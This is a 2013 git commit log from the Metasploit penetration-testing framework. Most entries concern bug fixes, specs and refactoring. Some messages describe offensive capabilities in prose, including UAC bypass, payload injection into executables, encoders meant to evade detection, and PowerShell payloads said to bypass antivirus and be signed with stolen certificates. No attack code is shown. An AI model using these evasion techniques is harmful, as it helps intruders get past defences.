Tod Beardsley 356263df56
Litter some more rescue nil's in there
I hate them but they were there when I got there.

A more sane way to deal with this should happen someday.
2013-10-09 12:17:13 -05:00
Tod Beardsley f95da649f8
Deal with missing bins, too.
This could be way more DRY. At least there's a YARD-ish comment.

This fixes up https://github.com/rapid7/metasploit-framework/pull/2465
to be a more complete solution.

[SeeRM #8465]
2013-10-09 12:13:44 -05:00
jvazquez-r7 2593c06e7c
Land #2412, @mwulftange's printf cmd stager 2013-10-08 09:08:29 -05:00
Tod Beardsley ff6dec5eee
Promote joev to a first class citizen
[See #2476]
2013-10-07 12:40:43 -05:00
Markus Wulftange 836ff24998 Clean and fix CmdStagerPrintf
Clean up of the CmdStagerPrintf as discussed in mwulftange#1
2013-10-05 10:39:55 +02:00
ZeroChaos 5f4e4de267 fix for bug 8456
On systems without bundled johntheripper (either by removing the bundled version or by no compatible version shipped) the system john is used.  In this case, all of the checking for compatible bundled jtr makes no sense and as such we can shortcut out of this to not only reduce the size of msf (for embedded) but also to speed execution (saving multiple calls to some random bundled binary cpuinfo*.bin).

This patch makes it very easy to simply remove cpuinfo and msf will not try to run it when missing and default to running john from the path.
2013-10-04 15:58:47 -04:00
James Lee 541833e2cc Convert llmnr_response to use Net::DNS
* Allows responding to AAAA requests in addition to the existing A
  support
* Prevents problems when recvfrom returns a mapped address like
  "::ffff:192.0.2.1"

Also:

* Fix a few typos
* capture: Don't shadow a method name (arp) with a local variable
* capture: Handle the case where our UDP send hits an ENETUNREACH
2013-10-04 12:35:30 -05:00
Meatballs c460f943f7
Merge branch 'master' into data_dir
Conflicts:
	modules/exploits/windows/local/always_install_elevated.rb
	plugins/sounds.rb
	scripts/meterpreter/powerdump.rb
	scripts/shell/spawn_meterpreter.rb
2013-10-02 20:17:11 +01:00
James Lee b822a41004 Axe errant tabs and unused vars 2013-10-02 13:47:39 -05:00
Meatballs 29a7059eb4
Update AlwaysInstallElevated to use a generated MSI file
Fixes bugs with MSI::UAC option, invalid logic and typo...
2013-09-29 17:09:03 +01:00
OJ 58cd2c796e Add a bind port setting to reverse listeners
This adds a `ReverseListenerBindPort` advanced setting to the reverse listeners whic
allows for the local bind port to be separated from the `LHOST` setting used in the
payload. This means that listeners can bind to different ports in cases where the
attacker isn't able to listen on the same port that the victim can call out on, but
there are NATs/portforwards/whatever in place that allow the connection to happen.
2013-09-28 05:38:39 +10:00
Meatballs 8a9843cca6
Merge upstream/master 2013-09-27 20:02:23 +01:00
Meatballs 971d0b7536 Generate args 2013-09-27 12:48:10 +01:00
Meatballs 3d812742f1 Merge upstream master 2013-09-26 21:27:44 +01:00
Meatballs 7ba846ca24 Find and replace 2013-09-26 20:34:48 +01:00
Meatballs a25833e4d7 Fix %TEMP% path 2013-09-26 19:22:36 +01:00
Tod Beardsley 8696b5d2dc
Fix bug on missing hosts for SunRPC Portmap
Also cleans up and normalizes the print messages to follow the
conventions of "host:port - proto - message"

[FixRM #8409], reported by Chris F.
2013-09-26 09:42:38 -05:00
jvazquez-r7 58d4096e0f Resolv conflicts on #2267 2013-09-25 13:06:14 -05:00
joev 99e46d2cdb Merge branch 'master' into cve-2013-4660_js_yaml_code_exec
Conflicts:
	modules/exploits/multi/handler.rb
2013-09-25 00:32:56 -05:00
Tod Beardsley 8db1a389eb
Land #2304 fix post module require order
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
Markus Wulftange 9353929945 Add CmdStagerPrintf 2013-09-23 22:02:29 +02:00
Meatballs 695fdf836c Generate NonUAC MSIs 2013-09-21 13:13:18 +01:00
Meatballs 85ea9ca05a Merge branch 'master' of github.com:rapid7/metasploit-framework into msi_payload 2013-09-21 12:49:38 +01:00
Joe Vennix a08d195308 Add Node.js as a platform.
* Fix some whitespace issues in platform.rb
2013-09-20 18:14:01 -05:00
jvazquez-r7 87f75e1065 Complete CmdStagerEcho code doc 2013-09-20 13:24:53 -05:00
Meatballs 7d1c5c732a Correct powershell 2013-09-20 18:36:24 +01:00
Meatballs 5add142789 Choose smallest smallest 2013-09-20 13:47:51 +01:00
Meatballs a00f3d8b8e initial 2013-09-20 13:40:28 +01:00
Tod Beardsley e9e1b28ba8
Land #2371, echo -e cmd stager 2013-09-19 14:47:39 -05:00
James Lee 8fe9132159
Land #2358, deprecate funny names 2013-09-18 14:55:33 -05:00
James Lee 150f0f644e Merge branch 'rapid7' into bug/osx-mods-load-order
Conflicts:
	modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
Tod Beardsley dae8847c4d
Land #2374, more complete 32/64 migrate fix
[FixRM #8395]
2013-09-17 14:52:04 -05:00
Meatballs 9aca98a9d4 Dont need to bypass 2013-09-17 19:12:49 +01:00
James Lee c77d49a640 Merge branch 'rapid7' into cleanup/remove-id-tags
Conflicts:
	lib/msf/core/payload/osx/bundleinject.rb
	lib/msf/core/payload/windows/dllinject.rb
	lib/msf/core/payload/windows/exec.rb
	lib/msf/core/payload/windows/loadlibrary.rb
	lib/msf/core/payload/windows/reflectivedllinject.rb
	lib/msf/core/payload/windows/x64/reflectivedllinject.rb
	scripts/meterpreter/netenum.rb
2013-09-17 10:55:02 -05:00
James Lee 97d3a20f82 Remove more $Revision tags 2013-09-17 10:46:37 -05:00
James Lee d6954e9ce7 Fix migrate from 32- to 64-bit processes
In some cases, it was possible to end up in a situation where the x64
reflective library hadn't been loaded by the time a user typed migrate.
If the target process was 64-bit, msfconsole would error out with a
NoMethodError and much sadness would ensue.

[See #2356]
2013-09-16 16:04:50 -05:00
jvazquez-r7 a8198bc948 Add documentatio to the mixin 2013-09-16 11:55:30 -05:00
jvazquez-r7 a5049df320 Add echo CmdStager 2013-09-16 11:35:05 -05:00
Meatballs 60328d5b2a Bypass no profile and hidden by default 2013-09-13 21:22:15 +01:00
Tod Beardsley 53a7e74813
Land #2360
All the specs pass, and it's difficult to repo many of these cases to
see if bugs are actually here, but it's a good idea to enforce binary
regexs.
2013-09-13 14:43:53 -05:00
Meatballs 9ade4cb671 Refactor 2013-09-13 20:43:09 +01:00
Meatballs aa4ad2b005 Change to ' and remove " 2013-09-13 20:23:18 +01:00
Meatballs 243d3d6ebd Apply comments 2013-09-13 19:19:54 +01:00
HD Moore 72dff03426 FixRM #8396 change all lib use of regex to 8-bit pattern 2013-09-12 16:58:49 -05:00
James Lee 6cc5965123
Land #2278, exe injection refactor 2013-09-12 16:37:58 -05:00
Tod Beardsley 76f27ecde8 Require the deprecation mixin in all modules
Because rememberin to require it, and hoping against a race is not how we
roll any more.
2013-09-12 15:49:33 -05:00
David Maloney e80cda4ace Merge branch 'master' into spike/exe_generation 2013-09-12 12:36:10 -05:00
James Lee 30c2efe3b2 Add require for eventlog
Even though nothing uses it except an old script
2013-09-11 16:21:10 -05:00
Markus Wulftange 80243c6e4d Disable default sorting on MSSQL results
When printing output using the `mssql_print_reply`, the output gets
sorted by default by the first column. This can distort the output,
especially when the row order is crucial like in case of executing
external commands with `mssql_xpcmdshell`.

This patch disables sorting by initializing Rex::Ui::Text::Table
with SortIndex = -1.
2013-09-09 20:14:48 +02:00
David Maloney 5773a009f5 Merge branch 'spike/exe_generation' of github.com:/dmaloney-r7/metasploit-framework into spike/exe_generation 2013-09-09 12:17:36 -05:00
David Maloney d6e4e46d86 better validation of buffer register 2013-09-09 12:16:15 -05:00
jvazquez-r7 eb745af12f Land #1054, @Meatballs1 exploit for IPsec Keying and more 2013-09-05 16:53:20 -05:00
Tab Assassin 2bd1fb451b Retab changes for PR #1569 2013-09-05 16:16:05 -05:00
Tab Assassin 48cf2af685 Merge for retab 2013-09-05 16:16:00 -05:00
James Lee adfb31e30a Land #2316, don't modify datastore in authbrute 2013-09-05 16:04:15 -05:00
jvazquez-r7 368a78a963 Undo post setup change 2013-09-05 15:00:58 -05:00
Meatballs d4043a6646 Spaces and change to filedropper 2013-09-05 20:41:37 +01:00
Meatballs c5daf939d1 Stabs tabassassin 2013-09-05 20:36:52 +01:00
Tab Assassin 874ed2ac17 Retab changes for PR #2107 2013-09-05 14:30:08 -05:00
Tab Assassin 27564b2de2 Merge for retab 2013-09-05 14:30:03 -05:00
James Lee 41f6ab3073 Land #2294, fix post setup
Conflicts:
	lib/msf/core/post.rb
2013-09-05 14:11:32 -05:00
Tab Assassin f5a4c05dbc Retab changes for PR #2267 2013-09-05 14:11:03 -05:00
Tab Assassin 4703a10b64 Merge for retab 2013-09-05 14:10:58 -05:00
Tab Assassin 63612a64e9 Merge for retab 2013-09-05 14:08:09 -05:00
Tab Assassin d0360733d7 Retab changes for PR #2282 2013-09-05 14:05:34 -05:00
Tab Assassin 49dface180 Merge for retab 2013-09-05 14:05:28 -05:00
Tab Assassin 845bf7146b Retab changes for PR #2304 2013-09-05 13:41:25 -05:00
Tab Assassin adf9ff356c Merge for retab 2013-09-05 13:41:23 -05:00
Tab Assassin abb52a086c Retab changes for PR #2316 2013-09-05 13:33:59 -05:00
Tab Assassin 8665de0261 Merge for retab 2013-09-05 13:33:49 -05:00
Tab Assassin 896bb129cd Retab changes for PR #2325 2013-09-05 13:24:09 -05:00
Tab Assassin 5ff25d8b96 Merge for retab 2013-09-05 13:23:25 -05:00
James Lee b913fcf1a7 Add a proper PrependFork for linux
Also fixes a typo bug for AppendExit
2013-09-04 00:15:07 -05:00
Meatballs 1471a4fcef Fixes an error in file_dropper where @dropped_files is nil
causing an exception to be raised and on_new_session to fail.

I have moved super to the top of the chain so it always gets
called regardless.
2013-09-03 23:45:41 +01:00
Meatballs c687f23b81 Better error handling 2013-09-03 22:57:27 +01:00
Meatballs a8e77c56bd Updates 2013-09-03 22:46:20 +01:00
Meatballs ac0c493cf9 Merge branch 'master' of github.com:rapid7/metasploit-framework into local_win_priv_keyring 2013-09-03 21:33:11 +01:00
Meatballs 13244efecf Spacing and bugfixes 2013-09-02 21:57:11 +01:00
Meatballs 051ef0bdfa Refactor to common post module 2013-09-02 20:24:54 +01:00
jvazquez-r7 560d384633 Do first modification to Auxiliary::Login and Auxiliary::AuthBrute 2013-08-31 23:38:04 -05:00
Tab Assassin 7e5e0f7fc8 Retab lib 2013-08-30 16:28:33 -05:00
Meatballs 53c3f6b2db Deconflict 2013-08-30 10:52:42 +01:00
James Lee 37f8d7a536 And one more. 2013-08-29 23:52:00 -05:00
James Lee 49bfc84ea6 Bah, missed changes after refactor
Thanks, travis-ci!
2013-08-29 23:39:29 -05:00
James Lee 63adde2429 Fix load order in posts, hopefully forever 2013-08-29 13:37:50 -05:00
jvazquez-r7 ab58e2db41 Ensure PostMixin setup is called 2013-08-27 18:03:30 -05:00
sinn3r a91b38cbf4 Land #2276 - osx webcam and record_mic post modules 2013-08-27 12:28:14 -05:00
lsanchez-r7 007b3de06d Merge pull request #2271 from bturner-r7/bug/db-leaks
Land #2271, Fix database connection leaks
2013-08-26 14:39:11 -07:00
David Maloney 5a424ab4df Allow user supplied buffer register
let the user pick, otherwise default to edx
2013-08-26 13:15:12 -05:00
Meatballs 3b9ded5a8e BypassUAC now checks if the process is LowIntegrityLevel
and fails if so. Some small improvements made to Post::Priv
and BypassUAC module.
2013-08-26 13:54:55 +01:00
David Maloney 383c9ed7f8 set edx as a BufferRegister
polymorphic encoders can now always use EDX
as a BufferRegister, making it harder to catch
the decoder stub.
2013-08-25 14:18:32 -05:00
Meatballs 96c093dce0 Fix Exploit::Exe 2013-08-25 19:56:29 +01:00
Meatballs 66ee15f461 Merge and deconflict 2013-08-25 19:14:15 +01:00
David Maloney f5e9089dd5 remove dupe comment 2013-08-25 12:46:47 -05:00
David Maloney a50fa2deec style fixups 2013-08-25 12:37:30 -05:00
Christian Mehlmauer 035258389f use feed first before trying to bruteforce 2013-08-25 10:16:43 +02:00
David Maloney 4c57af051a Revert "'remove unused framework references"
This reverts commit 98a09b9f5c.
2013-08-24 17:52:57 -05:00
David Maloney 98a09b9f5c 'remove unused framework references
passing around framework references that are never used
removing these whever possible
2013-08-24 16:59:29 -05:00
David Maloney 8f47aa6dcb Basic Injector class
create a class for injecting payloads
into an exe template as a new section
2013-08-24 16:11:00 -05:00
Christian Mehlmauer 7cd150b850 another module 2013-08-24 18:42:22 +02:00
Joe Vennix 2d3f599498 Moves ruby_dl helpers to proper place in repo.
* Adds fail_with methods and moves timeouts to constants.
2013-08-23 17:17:19 -05:00
Brandon Turner cd45c77080 Fix a few database leaks
All database access should be wrapped in with_connection blocks.

To avoid breaking git blame with a bunch of whitespace, I outdented
the with_connection blocks as seems to be common in db.rb.

[Story #55586616]
2013-08-21 18:53:17 -05:00
Brandon Turner c0700673e7 Fix SessionManager database leak
All database access should be wrapped in with_connection blocks.

Much of this commit is whitespace.  It may help to view it with
--ignore-all-space or the w=0 parameter on GitHub.

[Story #55586616]
2013-08-21 17:34:25 -05:00
Christian Mehlmauer 009d8796f6 wordpress is now a module, not a mixin 2013-08-22 00:05:58 +02:00
Christian Mehlmauer 0a2bf9e9e7 implement @limhoff-r7 feedback 2013-08-21 21:10:00 +02:00
Christian Mehlmauer 2e9a579a08 implement @limhoff-r7 feedback 2013-08-21 21:05:52 +02:00
Christian Mehlmauer ffdd057f10 -) Documentation
-) Added Wordpress checks
2013-08-21 14:27:11 +02:00
Christian Mehlmauer 655e2dcf6c more methods 2013-08-21 13:13:41 +02:00
Christian Mehlmauer 68a51f4055 msftidy 2013-08-21 12:50:26 +02:00
Christian Mehlmauer 11ef8d077c -) added wordpress mixin
-) fixed typo in web mixin
2013-08-21 12:45:15 +02:00
sinn3r f148eb4715 Land #2255 - Fix fail_with() 2013-08-20 01:28:21 -05:00
jvazquez-r7 491ea81acf Fix calls to fail_with from mixins 2013-08-19 16:42:52 -05:00
jvazquez-r7 7e37130837 Patch for [SeeRM #8315] 2013-08-19 16:34:02 -05:00
Tod Beardsley 1eb3c323ed Land #2175, force string encoding for RPC
Metasploit takes great pains to ensure that all strings are encoded as
plain old US-ASCII. This PR enforces this conversion over RPC as well.

[FixRM #7888]
2013-08-16 16:09:24 -05:00
Tod Beardsley 7937fbcc49 More idiomatic ruby with symbols and spaces 2013-08-16 15:59:04 -05:00
HD Moore bec15ebf7c Remove Failure (moved to parent class) 2013-08-15 13:31:21 -05:00
HD Moore 4706f8b54c Add fail_with() stub and move Failure from Exploit 2013-08-15 13:30:47 -05:00
sinn3r bd6a45fffa Get rid of version() use 2013-08-14 11:00:09 -05:00
sinn3r 83aec3b231 Remove module version display
Since modules no longer use the 'Version' key, there's no point to
collect and show them. It's all 0 anyway.

[See RM 8278]
2013-08-14 02:26:39 -05:00
James Lee 3827b14103 Land #1726, ssl verify mode
Conflicts:
	lib/rex/socket/parameters.rb
Fix doc strings
2013-08-12 17:57:10 -05:00
jvennix-r7 8278808a37 Merge pull request #2204 from todb-r7/bug/undo-optstring-validator
Revert "OptString specs and better validation"
2013-08-09 13:42:46 -07:00
Tod Beardsley 02f460287b Revert "OptString specs and better validation"
This reverts commit d66779ba4c.

Specifically, this commit was causing trouble when a datastore was
getting an Integer. For some reason (as yet undiscovered), the option
normalizer wasn't trying to Integer#to_s such arguments.

This kind of thing is going to happen a lot. For now, I'd rather just
end up with the ducktype, and attack the normalizer in a seperate fix.
2013-08-09 15:30:42 -05:00
sinn3r 4558aca7ca Land #2136 - Removed requirement for note.data to be present 2013-08-09 15:29:25 -05:00
Meatballs 08c32c250f File versions 2013-08-08 19:42:14 +01:00
RageLtMan 2c850d8f8b Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import 2013-07-31 18:39:46 -04:00
RageLtMan 7c46e95e8f Merge branch 'master' of https://github.com/rapid7/metasploit-framework into powershell_import 2013-07-31 18:34:57 -04:00
allfro 9180dd59fe Patch for string encoding issues with `msgpack`
Fixes an issue that causes exploits to fail if the PAYLOAD option is the last option to get marshalled in an MSFRPC dictionary. The patch adjusts the string's encoding to match the internal default encoding used by Ruby. Hence, making `fetch()` succeed.
2013-07-30 13:38:44 -04:00
Tod Beardsley 7e539332db Reverting disaster merge to 593363c5f with diff
There was a disaster of a merge at 6f37cf22eb that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).

What this commit does is simulate a hard reset, by doing thing:

 git checkout -b reset-hard-ohmu
 git reset --hard 593363c5f9
 git checkout upstream-master
 git checkout -b revert-via-diff
 git diff --no-prefix upstream-master..reset-hard-ohmy > patch
 patch -p0 < patch

Since there was one binary change, also did this:

 git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf

Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.
2013-07-29 21:47:52 -05:00
jvazquez-r7 05be76ecb7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-29 16:41:22 -05:00
jvazquez-r7 593363c5f9 Land #2154, @wchen-r7's msfcli optimizations and refactoring 2013-07-29 16:38:32 -05:00
Meatballs e1cfe7cfe2 Update datastore changes 2013-07-29 15:31:59 +01:00
sinn3r a0decf502f Refactor msfcli 2013-07-28 12:40:50 -05:00
jvazquez-r7 4a0b33241f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 18:41:50 -05:00
sinn3r 7b7603a5e7 Land #2104 - reverse_https_proxy 2013-07-25 17:26:56 -05:00
jvazquez-r7 33f6f7e8fc Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-25 17:03:45 -05:00
William Vu 27a540e12f Land #1215, creds reuse for AuthBrute modules 2013-07-25 16:54:44 -05:00
jvazquez-r7 2b3dcaf678 Land #2157, @wvu and @averagesecurityguy patch for OpenVAS XML Reports importing 2013-07-25 12:04:38 -05:00
William Vu 97680304d6 Use index, since it can apparently do regex 2013-07-25 12:00:33 -05:00
sinn3r 56367ef69c Update documentation 2013-07-24 19:04:47 -05:00
sinn3r 0fd2c385fb Update documentation 2013-07-24 19:02:10 -05:00
sinn3r e266d1bd0a Add comment about opts 2013-07-24 19:00:58 -05:00
sinn3r a71d7eb372 Update archive.rb to handle whitelist 2013-07-24 18:59:43 -05:00
sinn3r 9ae550c883 Do if [].empty?. Avoid msfcli running as a job 2013-07-24 18:35:06 -05:00
sinn3r ed51d284fa Change name, change how data is passed, fix rspec 2013-07-24 17:15:56 -05:00
sinn3r e120ecfba9 msfcli is designed to load only one module (auxiliary or exploit),
so we shouldn't have to load all of them to run this utility. The
overall goal of this PR is to narrow down what modules
(exploit/aux + payload + encoder + nop) you possibly need in order
to shave off loading time. By doing this, on my box this is 5-6
seconds faster than the original one.

I actually tried to avoid making too many changes in the library
(such as Module Manager), because we don't have test cases for them,
and we can't really afford to risk breaking it. I also developed
a test script to actually be able to test msfcli.
2013-07-24 14:40:46 -05:00
jvazquez-r7 e9a4f6d5da Merge branch 'dll_fix' of https://github.com/Meatballs1/metasploit-framework 2013-07-24 14:00:52 -05:00
Meatballs fee5fabb91 Revert x64 corruption changes 2013-07-24 19:59:04 +01:00
Meatballs 44cae75af1 Cleanup 2013-07-24 19:52:59 +01:00
Meatballs 4b84b49674 Fix payload corruption 2013-07-24 19:08:02 +01:00
jvazquez-r7 47c21dfe85 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-24 11:42:11 -05:00
William Vu d493346691 Land #2137, fixes and specs for Opt containers 2013-07-23 15:58:09 -05:00
jvazquez-r7 b0c17fdebc Land #2002, @jlee-r7's patch for better handling uri resources 2013-07-23 15:49:21 -05:00
jvazquez-r7 99a345f8d1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-22 13:54:26 -05:00
jvazquez-r7 77e8250349 Add support for CWE 2013-07-22 12:13:56 -05:00
RageLtMan 4df3b0215c replace lib/msf/core/exploit/powershell.rb, thanks @Meatballs1 2013-07-20 19:55:01 -04:00
David Maloney 943dde5c6c OptRegexp specs 2013-07-20 18:44:55 -05:00
RageLtMan 9d93891395 Import old powershell post lib from master
This is temporary and rather messy. Since the internals for
dealing with PSH code have moved to Rex there may be a hiccup or
two here. This was my original attempt at basic PSH integration
and does not make use of the new libraries and namespaces in
this PR.

Will introduce the updated modules and libraries in separate PR.
2013-07-20 19:33:19 -04:00
RageLtMan eb185375f7 Trim to core requirements
Remove .NET compiler, post lib and modules.
2013-07-20 19:31:26 -04:00
RageLtMan dc15c5b505 Merge branch 'master' into powershell_import
Resolve conflicts from old code being pulled into master.

Conflicts:
	lib/msf/core/exploit/powershell.rb
	modules/exploits/windows/smb/psexec_psh.rb
2013-07-20 19:29:55 -04:00
David Maloney d66779ba4c OptString specs and better validation 2013-07-20 17:49:03 -05:00
David Maloney d6f2b28708 More opt specs 2013-07-20 17:37:39 -05:00
Samuel Huckins 832db57171 Removed requirement for note.data to be present. It wasn't required in
the model or in specs, but was in db.rb, resulting in an error during
certain import scenarios.
2013-07-20 10:27:12 -05:00
David Maloney ec82644bd3 mo fixes mo specs
SEERM #7536
SEERM #7537
2013-07-18 15:00:57 -05:00
jvazquez-r7 1a5e0e10a5 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-18 13:53:57 -05:00
sinn3r 9d92b38dc7 Land #2121 - add specs for module search filter 2013-07-18 13:50:26 -05:00
Joe Vennix 67d8c1170b Remove unnecessary whitespace. 2013-07-18 13:43:30 -05:00
David Maloney 57dd525714 More optaddressrange specs and fixes
SEERM #7536
2013-07-18 13:03:32 -05:00
Joe Vennix f4b0ab8184 Adds 141 passing specs to Msf::Module#search_filter.
* tests exclusion functionality, type: matching, port: matching, app: matching,
   platform: matching, author: matching, text: matching, name: matching, and
   path: matching.
[RM #4790]
2013-07-18 12:47:08 -05:00
David Maloney 22e4db04e0 opening specs and fixes for OptAddressRange 2013-07-18 12:44:48 -05:00
David Maloney 27e2469d8e Specs and code changes for OptAddress
handles wierness around Optaddress.
Still need to address isues in optaddressRange

FIXRM #7537
2013-07-17 20:21:24 -05:00
jvazquez-r7 58229ff8b7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-17 20:18:48 -05:00
Tod Beardsley 72df070b80 Bump version to 4.8.0-dev, -rls is so fleeting 2013-07-17 16:43:24 -05:00
Tod Beardsley 8d1a760b1f Bump version to -rls 2013-07-17 16:42:37 -05:00
jvazquez-r7 11f8b351c0 Merge branch 'nvidia' of https://github.com/Meatballs1/metasploit-framework 2013-07-17 11:44:42 -05:00
Alexandre Maloteaux a5d526d710 remove metsrv.dll 2013-07-15 17:16:21 +01:00
Alexandre Maloteaux e28dd42992 add http authentification and socks 2013-07-15 15:36:58 +01:00
Alexandre Maloteaux f48c70d468 enable tor and small fix 2013-07-13 17:59:49 +01:00
James Lee 94f8b1d177 Land #2073, psexec_psh 2013-07-12 16:14:17 -05:00
James Lee 91b748a701 Make it clear where we failed
Even when VERBOSE=false
2013-07-12 15:57:30 -05:00
corelanc0d3r e8983a21c5 New meterpreter payload reverse_https_proxy 2013-07-12 16:45:16 -04:00
William Vu e8294b4f02 Add tentative fixes 2013-07-12 07:12:07 -05:00
James Lee 1ac1d322f2 Dup before modifying
Because `remove_resource` modifies @my_resources, we can't call it while
iterating over the actual @my_resources. The following snippet
illustrates why:

```
>> a = [1,2,3,4]; a.each {|elem| a.delete(elem); puts elem }
1
3
=> [2, 4]
```

[See #2002]
2013-07-12 00:57:10 -05:00
James Lee 38e837dc28 Remove inaccurate comment 2013-07-11 22:48:35 -05:00
William Vu f267c11bc4 Add regex fix 2013-07-10 15:43:16 -05:00
Tod Beardsley 56ffa4ae2f Fixes for network_interface PR #2085
Implementing the suggestions from @limhoff-r7.

See #2085

FixRM #8023
FixRM #7943
2013-07-10 13:25:06 -05:00
lsanchez-r7 4541a9e49e now with passing msftidy 2013-07-08 17:44:50 -05:00
lsanchez-r7 5c93fb2849 arp_sweep is once again working
modified the capture mixin to use NetworkInteface instead of
pcaprub for interfaces and addresses

FIXRM #8023,#7943
2013-07-08 17:24:28 -05:00
Meatballs 2bfe8b3b29 msftidy 2013-07-05 22:35:22 +01:00
Meatballs 0ce3fe2e7c Added service status checks to Post::Windows::Services
Added QueryServiceStatus to Railgun Advapi32 Definitions
Added Checks to module
2013-07-05 22:25:04 +01:00
jvazquez-r7 0e2380c115 Fix method documentation 2013-07-05 11:19:53 -05:00
RageLtMan 4554cc6e51 Import Powershell libs and modules (again)
Add Rex powershell parser:
 reads PSH, determines functions, variables, blocks
 compresses and cleans up the code it's read, obfuscates
 handles string literals and reserved variable names
 extracts code blocks and functions for reuse
  turns powersploit into a useful sub-component for MSF
Rewire Msf powershell modules
 Make use of Rex parser
 Handles payload generation, substituions
 Brings convenience methods - byte array generation and download
 Re-add .NET compiler
  Compiles .NET code (C#/VB.NET) in memory
  Can generate binary output file (dynamic persistence)
  Handles code-signing (steal cert with mimikatz, sign your bin)
  Not detected by AV (still...)
 Update payload generation
  GZip compression and decompression (see Rex module as well)
  msftidy violations for space efficiency - each char counts
Re-submit psexec-psh
 Makes use of updated Msf and Rex modules
 Runs shellcode in-memory (in a hidden PSH window)
 Completely bypasses all AVs tested for the last year...
2013-07-04 14:04:19 -04:00
Meatballs 1a0bdf335e Retab lib 2013-07-04 12:09:46 +01:00
Meatballs a76ee6c2ec Add flexibility to lib 2013-07-04 11:03:48 +01:00
Meatballs 1368c1c27f Move options to lib 2013-07-04 10:25:08 +01:00
Meatballs 03de8c1c3d Pull in exploit/powershell 2013-07-04 09:54:40 +01:00
sinn3r 0f37bbe78e Add has_pid? function
[SeeRM:#8123] - Add commonly used function has_pid?. Related to
redmine issue 8123.
2013-07-02 14:33:15 -05:00
jvazquez-r7 a5c3f4ca9b Modify ruby code according to comments 2013-06-29 08:54:00 -05:00
sinn3r e3989ad30c Extra comments, no thanks 2013-06-28 15:44:06 -05:00
sinn3r f4c805f5d6 Yarrrrrrrrd 2013-06-28 15:42:56 -05:00
sinn3r 6e1fa05757 Fix a handle leak & change thread creation flag 2013-06-28 13:23:08 -05:00
sinn3r 554d738f26 Update documentation
Fix broken English
2013-06-28 13:03:05 -05:00
sinn3r b7430cb569 Add Msf::Post::Windows::Process
The purpose of Msf::Post::Windows::Process is have all the common
functions you might need to do something to a process, for example:
injecting something to a process and then run it.
2013-06-28 12:55:06 -05:00
David Maloney ea13ac48ec "fix" indentation to make egypt happy 2013-06-27 17:16:13 -05:00
David Maloney 89faba288d damnit brandon turner 2013-06-27 17:12:37 -05:00
David Maloney 867be1257a slight rearrangement 2013-06-27 17:09:20 -05:00
David Maloney e3fde02eec conditional wrapping
as per egypt's catch
2013-06-27 17:07:16 -05:00
David Maloney 70433820a9 fixes FD leak in RPC client
FD leak due to sockets not getting closed
on the rpc client
FIXRM #8107
2013-06-27 16:57:02 -05:00
Josh d7eda343e9 fix typo in comment
change runing to running
2013-06-27 03:12:49 -05:00
James Lee 31ad7b50a9 Fix write_file on FreeBSD
[SeeRM #8083]
2013-06-25 17:19:00 -05:00
Daniele Martini c0fda81eb0 Removed options DB_ADD_ALL. Added options DB_ALL_PASS and DB_ALL_USERS
to add already known user and passwords to the lists.
2013-06-23 18:20:41 +02:00
James Lee 3c42fe594e No need to have rescue around a print 2013-06-21 15:55:43 -05:00
James Lee 2c12a43e77 Add a method for dealing with hardcoded URIs 2013-06-21 15:48:02 -05:00
James Lee 39d011780e Move deletion into #remove_resource
Doing it here means that modules manually calling remove_resource won't
screw up the cleanup
2013-06-21 15:34:54 -05:00
James Lee e8a92eb196 Keep better track of resources
[See #1623]
[SeeRM #7692]
2013-06-21 14:51:47 -05:00
James Lee 81b4efcdb8 Fix requires for PhpEXE
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
HD Moore 819080a147 Enable rhost/rport option overrides in HttpClient 2013-06-17 11:45:01 -05:00
Tod Beardsley d341b825d0 Rename dirbust option to conform to style 2013-06-14 12:58:08 -05:00
Tasos Laskos b509ac8504 Crawler mixin: Dirbusting opt moved to advanced 2013-06-13 00:04:31 +03:00
Tasos Laskos b474cda4aa Crawler/Anemone: Dirbusting now optional
[FIXRM #8030]

Anemone updated to make dirbusting optional (on by default) and the Crawler core
module updated to provide an option to do so.
2013-06-13 00:00:09 +03:00
Tod Beardsley 6a5d1d06b2 Make the conditional correct for print_prefix
Fixes a bug introduced on #1936.
2013-06-11 16:16:17 -05:00
Tod Beardsley f775a0bb01 Handle single quotes for OpenVAS import 2013-06-10 19:45:50 -04:00
Tod Beardsley 9a08090b0f Inch toward making modules more testable 2013-06-10 16:02:19 -05:00
Tod Beardsley d4e9431633 Add Gemfile entry for PacketFu 2013-06-10 14:18:05 -05:00
David Maloney 6aa7c74fdd make anemone also rspect domain 2013-06-07 14:24:14 -05:00
David Maloney 78b2a0a2ac add domain support to web spider 2013-06-07 12:41:20 -05:00
sinn3r 8e2de6d14f Updates js_property_spray documentation
After many tests, it turns out address 0x0c0d2020 is the most
consistent location acorss various IE versions.  For dev purposes,
it's rather important to have this documented somewhere.

Thanks to corelanc0d3r for the data.
2013-06-07 00:28:22 -05:00
David Maloney 2e26256217 was missing a nil check 2013-06-04 14:21:07 -05:00
David Maloney c4475538e7 Report on TaskSession associations
add TaskSession objects so when we report
on a session, we know what Task created it, if there
was a task
2013-06-04 13:42:36 -05:00
sinn3r 90117c322c Landing #1874 - Post API cleanup 2013-05-31 16:15:23 -05:00
Luke Imhoff cc60c95243 Rescue Errno::ENONENT when using File.mtime for memory cache
[#47720609]
2013-05-30 13:16:43 -05:00
Luke Imhoff 541d287e70 Merge branch 'master' into bug/module-load-cache-update 2013-05-30 12:59:50 -05:00
lsanchez-r7 8b488c3c6b Merge pull request #1866 from dmaloney-r7/bug/mdm_session_port
Add session_port to the mdm object

SEERM #7281
2013-05-30 10:05:48 -07:00
James Lee 12f0448bb4 Use a LIKE test instead of equality
Fixes the ability to search for CVE (as well as other reference types)
with a non-exact match

[SeeRM #7989]
2013-05-29 16:27:33 -05:00
